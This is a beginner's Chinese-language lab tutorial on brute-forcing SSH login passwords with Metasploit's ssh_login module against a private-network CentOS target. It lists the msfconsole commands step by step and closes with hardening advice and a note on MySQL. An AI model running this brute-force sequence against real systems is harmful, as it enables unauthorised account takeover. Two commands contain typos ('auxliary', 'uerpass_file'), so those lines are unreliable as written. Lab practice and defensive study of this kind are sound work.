友情提示:
初入安全,小白一個,本文重在學習與經驗分享!
背景
使用Kali自帶的MSF工具對SSH的賬號密碼進行爆破。
1. 實驗環境
本次實驗通過MSF,可直接對SSH的賬號密碼進行爆破。
Kali IP:192.168.0.10/24,或者安裝有MSF漏洞利用框架工具的計算機
靶機 IP:192.168.0.11/24
靶機系統版本:centos 6.5
2.爆破說明
用MSF爆破SSH或者MySQL賬戶信息時,最好使用多線程。因為實驗,所以使用的詮釋弱密碼。真正在生產環境中,遇到弱密碼的情況較少,一是要使用大字典,二是確保主機性能夠強,三是要有耐心.
3. SSH密碼爆破過程
3.1 SSH模塊搜索
(1)啟動MSF,并搜索SSH相關的模塊
(2)使用ssh_login模塊進行密碼爆破
use auxliary/scanner/ssh/ssh_login
# 查看參數配置項
show options
# 指定密碼字典文件
set pass_file /root/password.txt
# 指定爆破的主機
set rhosts 192.168.0.11
# 指定爆破主機的用戶名或者用戶名字典文件
set username root //指定用戶名為root
或
set uerpass_file /root/username.txt //指定用戶名字典文件
# 指定爆破端口,SSH協議默認是22。如果用戶修改了端口號,可以通過NMAP等工具探測其開放的端口。
set RPORT 22
# 執行爆破
run
(3)成功爆出root用戶的密碼
4. 安全建議
(1)增加用戶口令的復雜度以及長度。
(2)增加用戶頻繁試錯登錄次數限制,如:5次試錯登錄后鎖定賬戶1小時等措施。
(3)限制遠程SSH管理的IP地址段或者IP地址,確保最小化原則。
5. 爆破番外MySQL篇
爆破MySQL數據庫用戶密碼的過程與SSH爆破過程是一樣的,只不過使用的MSF模塊不同。鑒于數據庫的重要性,建議不開啟數據庫的遠程管理(內網或外網)。如業務需要必須開啟內網遠程管理,也要嚴格限制遠程管理的IP地址段或IP地址,確保最小化原則。并且,嚴格限制不同用戶的權限。